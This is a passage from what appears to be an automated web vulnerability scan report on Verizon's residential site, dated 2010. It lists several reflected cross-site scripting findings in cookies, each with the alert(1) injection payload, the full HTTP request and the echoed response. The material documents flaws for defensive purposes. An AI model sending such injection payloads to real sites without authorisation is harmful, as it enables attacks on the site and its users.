Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65384
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668a0'><script>alert(1)</script>fc8df7db051; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668A0'><SCRIPT>ALERT(1)</SCRIPT>FC8DF7DB051 ' />
...[SNIP]...

3.265. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 165a7'><script>alert(1)</script>638a1bf81ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX165a7'><script>alert(1)</script>638a1bf81ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 02:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX165a7'><script>alert(1)</script>638a1bf81ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX165A7'><SCRIPT>ALERT(1)</SCRIPT>638A1BF81ED ' />
...[SNIP]...

3.266. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 9afbe<script>alert(1)</script>42141e4a677 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9afbe<script>alert(1)</script>42141e4a677; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119106
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX9afbe<script>alert(1)</script>42141e4a677; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9AFBE<SCRIPT>ALERT(1)</SCRIPT>42141E4A677 </DIV>
...[SNIP]...

3.267. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc43"-alert(1)-"8aa6b87ac33 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=adc43"-alert(1)-"8aa6b87ac33; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125619
Expires: Sat, 20 Nov 2010 02:57:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "adc43"-alert(1)-"8aa6b87ac33"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.268. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a2a'><script>alert(1)</script>3f33f50afae was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX72a2a'><script>alert(1)</script>3f33f50afae; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58779
Expires: Sat, 20 Nov 2010 02:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX72a2a'><script>alert(1)</script>3f33f50afae; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX72A2A'><SCRIPT>ALERT(1)</SCRIPT>3F33F50AFAE ' />
...[SNIP]...

3.269. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 8b27c<script>alert(1)</script>9b933fecabb was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

